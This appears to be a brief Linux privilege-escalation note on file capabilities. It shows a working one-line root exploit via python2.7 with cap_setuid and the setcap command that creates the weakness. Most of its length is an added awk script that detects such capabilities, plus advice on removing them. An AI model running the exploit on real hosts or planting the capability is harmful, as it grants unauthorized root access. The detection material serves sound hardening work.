Linux capabilities

Exploitation example

In the following example, the binary /usr/bin/python2.7 is found to be vulnerable to privilege escalation because it has been given the cap_setuid capability:

setcap cap_setuid+ep /usr/bin/python2.7
/usr/bin/python2.7 = cap_setuid+ep

#Exploit
/usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash");'
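
A defender-side check for the condition shown above, as an added example that is not part of the original page: it reads `getcap -r` output and lists every file whose permitted set includes cap_setuid. The function names and the sample lines other than the python2.7 entry are constructed for illustration, and paths are assumed to contain no whitespace.

```shell
#!/bin/sh
# Added example: flag files whose file capabilities grant a given capability.
# Reads getcap output on stdin and prints one flagged path per line.
# Usage: flag_setuid_caps [capability]   (default: cap_setuid)
flag_setuid_caps() {
    awk -v want="${1:-cap_setuid}" '
    {
        path = $1
        hit = 0
        # Older getcap prints "path = caps", newer prints "path caps".
        # The bare "=" field carries no flags, so the loop skips it.
        for (i = 2; i <= NF; i++) {
            clause = $i
            # Split "cap_a,cap_b+ep" or "cap_a=ep" at the first operator.
            # Clauses that only remove flags ("cap_a-ep") are ignored.
            pos = match(clause, /[=+]/)
            if (pos == 0) continue
            caps  = substr(clause, 1, pos - 1)
            flags = substr(clause, pos + 1)
            # Permitted (p) is enough to flag: the process can raise a
            # permitted capability into its effective set by itself.
            if (index(flags, "p") == 0) continue
            # An empty list ("=ep") means every capability.
            if (caps == "" || index("," caps ",", "," want ",") > 0) hit = 1
        }
        if (hit) print path
    }'
}

# Constructed sample in both getcap output styles (not from a real host).
sample_getcap_output() {
    cat <<'EOF'
/usr/bin/python2.7 = cap_setuid+ep
/usr/bin/ping cap_net_raw=ep
/opt/tool cap_net_bind_service,cap_setuid=p
/opt/all =ep
/opt/inherit cap_setuid+i
EOF
}

# Demo run over the constructed sample.
sample_getcap_output | flag_setuid_caps
```

On a real host, feed it with `getcap -r / 2>/dev/null | flag_setuid_caps`; a capability that a flagged file does not need can be removed with `setcap -r <file>`.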

More

  • https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities#user-capabilities